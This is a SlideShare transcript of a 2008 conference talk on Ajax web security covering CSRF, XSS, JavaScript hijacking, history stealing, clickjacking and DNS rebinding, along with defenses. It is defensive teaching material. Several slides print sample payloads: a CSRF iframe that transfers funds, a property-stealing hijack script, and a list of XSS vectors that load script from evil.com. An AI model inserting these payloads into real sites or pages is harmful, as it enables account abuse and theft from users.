• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Ajax Security
 

Ajax Security

on

  • 38,749 views

A talk from the Ajax Experience

A talk from the Ajax Experience

Statistics

Views

Total Views
38,749
Views on SlideShare
29,715
Embed Views
9,034

Actions

Likes
69
Downloads
2,552
Comments
5

110 Embeds 9,034

http://getahead.org 2255
http://ajaxian.com 1201
http://directwebremoting.org 931
http://5works.dev 662
http://blog.dreamcss.com 585
http://laacz.lv 454
http://www.gnucitizen.org 436
http://www.ajaxian.com 361
http://join5works.com 268
http://www.sitepen.com 215
http://www.logadmin.net 182
http://www.mimul.com 138
http://baltecolog.ru 107
http://hackathology.blogspot.com 96
http://22by7tech.blogspot.com 82
http://www.netvibes.com 76
http://latha-math.com 73
http://php.by 67
http://security4all.blogspot.com 62
http://singe.za.net 60
http://www.burakdayioglu.net 57
http://www.blankus.net 44
http://kislo8metal.blogspot.com 44
http://mimul.com 41
http://breach-inv.blogspot.com 41
http://blog.code.ae 35
http://onwebdev.blogspot.com 34
http://www.baltecolog.ru 34
http://www.slideshare.net 27
http://www.dmxzone.com 23
http://ajaxus.net 22
http://22by7tech.blogspot.in 18
http://feeds.feedburner.com 16
http://min2liz.net 13
http://www.hanrss.com 12
http://s3.amazonaws.com 11
http://websecurity.com.ua 11
http://vie-eu-wik-01 10
http://blog.ecmas4.com 10
http://www.nofluffjuststuff.com 10
file:// 10
http://blog.security4all.be 9
http://localhost:16296 9
http://extjs.com 9
http://www.php.by 8
http://ecruu.tistory.com 8
http://www.ajax-blog.com 8
http://www.join5works.com 7
http://www.pcsec.org 7
http://lowe.wangandmin.com 7
More...

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel

15 of 5 previous next Post a comment

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Ajax Security Ajax Security Presentation Transcript

    • Ajax Security Keeping your application safe Joe Walker Copyright SitePen, Inc. 2008. All Rights Reserved
    • 89 out of 10 Websites have serious vulnerabilities Copyright SitePen, Inc. 2008. All Rights Reserved
    • Goal: Keep the bad guys out of your website Copyright SitePen, Inc. 2008. All Rights Reserved
    • The Attackers Who is the attacker? • Troublemakers / Thieves Who is the victim? • Your data / Your users / Your partners Copyright SitePen, Inc. 2008. All Rights Reserved
    • Agenda CSRF, Login CSRF JavaScript Hijacking XSS History Stealing Combination Attacks Session Fixation + ADP + Clickjacking Copyright SitePen, Inc. 2008. All Rights Reserved
    • CSRF (Cross Site Request Forgery) You can still abuse someone else’s cookies and headers even if you can’t read them
    • Recap: Cross-Domain Rules www.bank.com www.evil.com c = document.cookie; c = document.cookie; alert(c); alert(c); /* /* Shows cookies from Shows cookies from www.bank.com www.evil.com */ */ Copyright SitePen, Inc. 2008. All Rights Reserved
    • Abusing a Cookie without reading it www.bank.com www.evil.com Welcome to Bank.com Welcome to Evil.com We offer the best rates anywhere in We’ve got lots of warez to give away the world, guaranteed. Give us your for freee. Download our stuffs and money and we will look after it in then come back and get more the same way we look after little stuffs. Videoz, Warez, Codez, Mp3s baby kittens. . <iframe width=0 height=0 src=quot;http://bank.com/transfer?amnt=all&dest=MrEvilquot;/> Copyright SitePen, Inc. 2008. All Rights Reserved
    • CSRF JavaScript is not always required to exploit a CSRF hole Often all you need is: • <iframe src=quot;dangerous_urlquot;> • or <img src=quot;dangerous_urlquot;/> • or <script src=quot;dangerous_urlquot;> You can’t use XHR because cross-domain rules prevent the request from being sent Copyright SitePen, Inc. 2008. All Rights Reserved
    • CSRF CSRF attacks are write-only (with one exception) Both GET and POST can be forged Referrer checking is not a complete fix It’s not just cookies that get stolen: • HTTP-Auth headers • Active Directory Kerberos tokens Copyright SitePen, Inc. 2008. All Rights Reserved
    • CSRF - Protection Not 100% solution Force users to log off Check referrer headers (https only) Include authentication tokens The only complete in the body of EVERY request solution Copyright SitePen, Inc. 2008. All Rights Reserved
    • CSRF - Protection Security tokens in GET requests are not a great idea (bookmarks, caches, GET is idempotent etc) POST means forms with hidden fields • OWASP servlet filter http://www.owasp.org/index.php/CSRF_Guard Double-submit cookie pattern (Ajax requests only) • Read the cookie with Javascript and submit in the body Copyright SitePen, Inc. 2008. All Rights Reserved
    • Login CSRF (Tricking someone into thinking they are you) CSRF turned inside out
    • Login CSRF If I can make your browser do things behind your back, how about logging you out of some service and back in as me. What are the possibilities when you think that you are you, but you’re not; you’re me? Copyright SitePen, Inc. 2008. All Rights Reserved
    • Login CSRF - Attacks What can I do? • See what you search for • See what books you want to buy • Read emails that you send • Steal credit card details through PayPal • etc Copyright SitePen, Inc. 2008. All Rights Reserved
    • Login CSRF - Defense If submitting over https: use Referrer checking • Do not assume no referrer is safe Use authentication tokens in your login form Watch out for session fixation attacks • Invalidate the server session on login and re-create it Copyright SitePen, Inc. 2008. All Rights Reserved
    • JavaScript Hijacking (or how your GMail contacts were at risk) Sucking data out of Objects before they’re created
    • JavaScript Hijacking “CSRF is write-only with one known exception” Using <script> automatically evaluates the returned script So if you can just find a way to intercept scripts as they are evaluated ... Copyright SitePen, Inc. 2008. All Rights Reserved
    • <script type=quot;text/javascriptquot;> function Object() { alert(quot;Hello, Worldquot;); } var x = {}; </script> Copyright SitePen, Inc. 2008. All Rights Reserved
    • <script type=quot;text/javascriptquot;> function Object() { this.__defineSetter__('wibble', function(x) { alert(x); }); } var x = {}; x.wibble = quot;Hello, Worldquot;; </script> Copyright SitePen, Inc. 2008. All Rights Reserved
    • <script type=quot;text/javascriptquot;> var obj; function Object() { obj = this; this.__defineSetter__('killme', function(x) { for (key in obj) { if (key != 'killme') { alert('Stolen: ' + key + '=' + obj[key]); } } }); setTimeout(quot;obj['killme']='ignored';quot;, 0); } </script> <script src=quot;http://example.com/data-service/quot;> Copyright SitePen, Inc. 2008. All Rights Reserved
    • JavaScript Hijacking When you serve JavaScript from a website it could be evaluated in a hostile environment Protect secrets in JavaScript in the same way that you would protect them elsewhere Copyright SitePen, Inc. 2008. All Rights Reserved
    • JavaScript Hijacking Sometimes people wish to have a double layer of security to prevent evaluation: /*<JSON_HERE>*/ (Don’t do this) while(true); <JSON_HERE> (Google) throw new Error(quot;quot;); <JSON_HERE> (DWR) {}&& <JSON_HERE> Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS (Cross Site Scripting) Abusing someone’s trust in your typing
    • Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS 2 types: • Reflected: Script embedded in the request is ‘reflected’ in the response • Stored: Attacker’s input is stored and played back in later page views Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS Scenario: You let the user enter their name Someone is going to enter their name like this: Joe<script src=quot;http://evil.com/danger.jsquot;> Then, whoever looks at Joe’s name will execute Joe’s script and become a slave of Joe Generally HTML is not a valid input, but sometimes it is: • Blogs, MySpace, Wikis, RSS readers, etc Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Making User Input Safe So, you filter out ‘<script.*>’ and then you’re safe. Right? Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Places that scripts get eval()ed 1. <table background=quot;javascript:danger()quot;> 14.<body background=quot;javascript:danger()quot;> 2. <input type='image' src='javascript:danger()'/> 15.<div onscroll='danger()'> 3. <object type=quot;text/x-scriptletquot; 16.<div onmouseenter='danger()'> data=quot;evil.com/danger.jsquot;> 17.<style> 4. <img src='javascript:danger()'/> @import evil.com/danger.js</style> 5. <frameset> 18.<style>BODY{-moz-binding:url( <frame src=quot;javascript:danger()quot;> quot;http://evil.com/danger.js#xssquot; )}</style> 6. <link rel=quot;stylesheetquot; href=quot;javascript:danger()quot;/> 19.<xss style=quot;behavior:url(danger.htc);quot;> 7. <base href=quot;javascript:danger()quot;> 20.<div style=quot;background-image: 8. <meta http-equiv=quot;refreshquot; url(javascript:danger())quot;> content=quot;0;url=javascript:danger()quot;> 21.<div style=quot;width: 9. <p style='background-image: expression(danger());quot;> url(quot;javascript:danger()quot;)'); 22.<xss style=quot;xss:expression(danger())quot;> 10.<a href='javascript:danger()'> 11.<tr background=quot;javascript:danger()quot;> Many more 12.<body onload='danger()'> http://ha.ckers.org/xss.html 13.<div onmouseover='danger()'> Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=quot;a.htmlquot; link</a> makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=quot;a.htmlquot;>link makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=quot;a.html >link</a> makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: (depending on some encoding tricks) ¼a href=quot;a.htmlquot;¾link¼/a¾ makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Making User Input Safe And we haven’t got into: • Flash (ActionScript ~= JavaScript) • SVG (can embed JavaScript) • XML Data Islands (IE only) • HTML+TIME You can use both <object> and <embed> for many of these Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - The Heart of the Problem “Be conservative in what you do; be liberal in what you accept from others” Postel’s Law Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - The Heart of the Problem In + A Out B Copyright SitePen, Inc. 2008. All Rights Reserved
    • The web developers get lazy ... Copyright SitePen, Inc. 2008. All Rights Reserved
    • The browser fixes the problems ... Copyright SitePen, Inc. 2008. All Rights Reserved
    • The users like the new browser ... Copyright SitePen, Inc. 2008. All Rights Reserved
    • The web developers get even lazier ... Copyright SitePen, Inc. 2008. All Rights Reserved
    • The browser fixes the problems ... Copyright SitePen, Inc. 2008. All Rights Reserved
    • The users like the new browser even more ... Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - The Heart of the Problem ¼STYLE¾@import'javas cri pt:danger()';¼/STYLE¾ Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Protection (HTML is Illegal) 1. Filter inputs by white-listing input characters • Remember to filter header names and values 2. Filter outputs for the destination environment For HTML: < &lt; > &gt; ' &apos; quot; &quot; & &amp; For JavaScript Strings (but see later): ' ' quot; quot; LF n CR r * uXXXX Other environments have other special chars Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Protection (well-formed HTML is legal) 1. Filter inputs as before 2. Validate as HTML and throw away if it fails 3. Swap characters for entities (as before) 4. Swap back whitelist of allowed tags. e.g.: • &lt;strong&gt; <strong> 5. Take extra care over attributes: • &lta href=&quot;([^&]*)&quot;/&gt; <a href=quot;$1quot;/> 6. Take great care over regular expressions Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Protection (malformed HTML is legal) 1. Find another way to do it / Swap jobs / Find some other solution to the problem 2. Create a tag soup parser to create a DOM tree from a badly formed HTML document • Remember to recursively check encodings 3. Create a tree walker that removes all non approved elements and attributes Copyright SitePen, Inc. 2008. All Rights Reserved
    • There is NO WAY to protect against some injection points Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Injection Points Places you can protect: • Plain content <div>$</div> • Some attribute values <input name=x value=quot;$quot;> (but take care) • Javascript string values: <script>str = quot;$quot;;</script> (but take care) Anything else is likely to be unsafe Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Injection Points Places you can’t easily protect: • <script>$</script> • <div $> • <div style=quot;$quot;>... • <div background=quot;$quot;> • <img src=quot;$quot;> • etc If users can affect CSS values, hrefs, srcs or plain JavaScript then you are likely to have an XSS hole Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS Tricks: Comment Power-up Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Comment Power-up Commonly reflected attacks have length restrictions How to create space for an injection attack • Use ‘<script>/*’ in an restricted unprotected field and ‘*/’ in a later unrestricted protected field Copyright SitePen, Inc. 2008. All Rights Reserved
    • XSS - Summary For data input: • Restrict allowed characters for destination type For data output: • Escaped for the destination environment • Ensure encoding is specified (e.g. UTF-8) Allow inject only into known safe points Never assume that a hole is too small to jump through Copyright SitePen, Inc. 2008. All Rights Reserved
    • History Stealing I know where you’ve been, parts 1, 2, 3
    • History Stealing - Part 1 Mr. Evil wants to know if you visit bank.com He creates a page with a link and uses a script to read the CSS link color: • purple: customer • blue: not a customer Copyright SitePen, Inc. 2008. All Rights Reserved
    • History Stealing - Part 2 2 methods of detecting link color: • Easy - use JavaScript to read CSS properties • When JS is turned off - use CSS to ping the server Copyright SitePen, Inc. 2008. All Rights Reserved
    • History Stealing - Part 2 Point a script tag at a protected HTML resource, detect differing replies by differing error messages <script src=quot;http://mail.google.com/mailquot;> http://ha.ckers.org/weird/javascript-website-login-checker.html Copyright SitePen, Inc. 2008. All Rights Reserved
    • History Stealing - Part 3 A page can quickly check thousands of sites and find where you bank and store your email A page can follow your clicks around the net: • Check for common set of URLs • Page reports hits to server • Server reads hit pages, greps out links sends links back • Page checks and follows a click-stream Copyright SitePen, Inc. 2008. All Rights Reserved
    • Combination Attacks Small holes don’t add up, they multiply up
    • Web Worms If your site that isn’t 100% safe against XSS and CSRF, users can attack their ‘friends’ with scripts XHR/Flash/Quicktime can be used as a vector Web worms grow much faster than email worms So far, infections have been mostly benign, like how email worms were in the early 90’s ... http://www.whitehatsec.com/downloads/WHXSSThreats.pdf Copyright SitePen, Inc. 2008. All Rights Reserved
    • Intranet Hacking History stealing to enumerate hosts inside the firewall Anti-DNS pinning to read HTML from inside Many routers / firewalls / etc have default passwords, which an attacker can exploit Use CSRF to alter router / firewall settings http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf Copyright SitePen, Inc. 2008. All Rights Reserved
    • Clickjacking When the page you are looking at is not the page you think you are looking at
    • Clickjacking - Protection if (window.top != window) { document.body.style.display = quot;nonequot;; } Copyright SitePen, Inc. 2008. All Rights Reserved
    • ADP = Anti DNS Pinning Moving intranet servers into your domain
    • Anti-DNS Pinning DNS for evil.com 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning DNS for evil.com 1.2.3.4 Let’s visit evil.com 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning DNS for evil.com What’s the IP address for evil.com? 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning DNS for evil.com You need 1.2.3.4 (timeout = 1 sec) 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning DNS for evil.com 1.2.3.4 Can I have http://evil.com? 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning HTML + DNS for evil.com JavaScript that creates an iframe 2 seconds after 1.2.3.4 the page has loaded 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning DNS for evil.com 1.2.3.4 Time passes (2 seconds) 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning DNS for evil.com What’s the IP address for evil.com? 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning DNS for evil.com You need 10.0.0.1 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning DNS for evil.com 1.2.3.4 Can I have 10.0.0.1 http://evil.com/blah? Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning DNS for evil.com 1.2.3.4 This web server is really http://intranet.corp.com 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning Outer frame reads DNS for evil.com text from inner iframe and sends it back to 1.2.3.4 1.2.3.4 10.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning About ‘Pinning’: Browsers ‘pin’ addresses to stop short timeouts DNS round-robin forces re-query of DNS if website appears to be down So websites can get around pins by firewalling themselves thus appearing to be down Copyright SitePen, Inc. 2008. All Rights Reserved
    • Anti-DNS Pinning It’s not great for the Internet: The browser thinks the domain is evil.com, so cookies for innocent.com are not sent: Cookie protected resources are safe (for now) But it’s great for Intranet hacking No cookies needed to read from 192.168.0.1 or 127.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved
    • Questions? Joe Walker http://sitepen.com http://directwebremoting.org/blog/joe Copyright SitePen, Inc. 2008. All Rights Reserved
    • Web 2.0 Hacking Everything has a down side
    • Web 2.0 Hacking Building blocks: • Google Alerts: Search to EMail • Mailinator: EMail to RSS • Ponyfish: Web to RSS via scraping • Storage: DabbleDB, Zoho • Yahoo Pipes: RSS remixing • L8R: Cron for EMail • Google Mashup Editor: RSS to REST API • Dapper, OpenKappow Copyright SitePen, Inc. 2008. All Rights Reserved
    • More Information Copyright SitePen, Inc. 2008. All Rights Reserved
    • Dropping SSL after login is dangerous Being able to snoop on someone else’s cookie is virtually the same as being able to snoop on their password Some services (e.g. Google) default to http after login (bad), but allow you to use https for the whole session: • https://mail.google.com/mail/ • https://www.google.com/calendar/ • etc. Copyright SitePen, Inc. 2008. All Rights Reserved
    • Useful Tools Firefox: • NoScript - Accept scripts only from sites you trust • AltCookies - Accept cookies only from sites you trust • EditCooikes - Alter cookies for testing • Firebug - Dig deeply into HTTP/JavaSript/CSS and HTTP General: • Paros - Filtering Proxy (can be configured to be transparent) • Burp - Like Paros • Fiddler - Like Paros with integration into IE Copyright SitePen, Inc. 2008. All Rights Reserved